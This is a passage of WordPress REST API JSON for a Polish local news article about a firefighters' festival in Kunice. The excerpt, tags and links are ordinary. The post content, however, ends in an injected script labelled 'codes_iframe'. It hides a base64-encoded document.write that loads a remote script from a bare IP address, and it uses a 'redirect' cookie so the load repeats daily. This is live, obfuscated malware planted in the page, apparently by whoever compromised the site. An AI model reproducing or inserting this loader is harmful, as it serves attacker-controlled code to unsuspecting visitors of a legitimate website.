src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Ostatni dzie\u0144 wakacji nie by\u0142 nudny. Pomimo kapry\u015bnej pogody, na stadionie &#8222;Unii Kunice&#8221; odby\u0142 si\u0119 tego dnia Festyn Stra\u017cacki. W pi\u0105tek, 1 wrze\u015bnia od godziny 11, na odwiedzaj\u0105cych czeka\u0142y liczne atrakcje. By\u0142o szkolenie obronne oraz \u0107wiczenia z wojskiem. Organizatorzy zapewnili mi\u0119dzy innymi ekspozycj\u0119 czo\u0142gu Leopard 2A5 oraz boj\u00f3wki OSP \u017bary-Kunice, pokaz sprz\u0119tu po\u017carniczego, pokazy ratownictwa, [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":6973,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[25],"tags":[824,320,269,335,53,146,470,109,350,376,825,471,111,686,68,405,373,374,394,122,73,349,821,820],"class_list":["post-6963","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-kultura-i-rozrywka","tag-festyn-strazacki","tag-gazeta-zary","tag-gmina-zary","tag-informacje-gmina-zary","tag-informacje-lubuskie","tag-informacje-powiat-zary","tag-informacje-zary-informacje-zary-zagan","tag-moja-gazeta","tag-moja-gazeta-tygodnik-regionalny-zary-zagan","tag-moja-gazeta-zary","tag-osp-kunice","tag-tygodnik-powiat-zary","tag-tygodnik-zary","tag-urzad-miasta-zagan","tag-urzad-miasta-zary","tag-wiadomosci-gmina-zary","tag-wiadomosci-lubsko","tag-wiadomosci-lubuskie","tag-wiadomosci-powiat-zary","tag-wiadomosci-zagan","tag-wiadomosci-zary","tag-wiadomosci-zary-zagan","tag-witaj-szkolo","tag-wydarzenia-powiat-zar"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/6963","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=6963"}],"version-history":[{"count":5,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/6963\/revisions"}],"predecessor-version":[{"id":13016,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/6963\/revisions\/13016"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/6973"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=6963"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=6963"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=6963"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}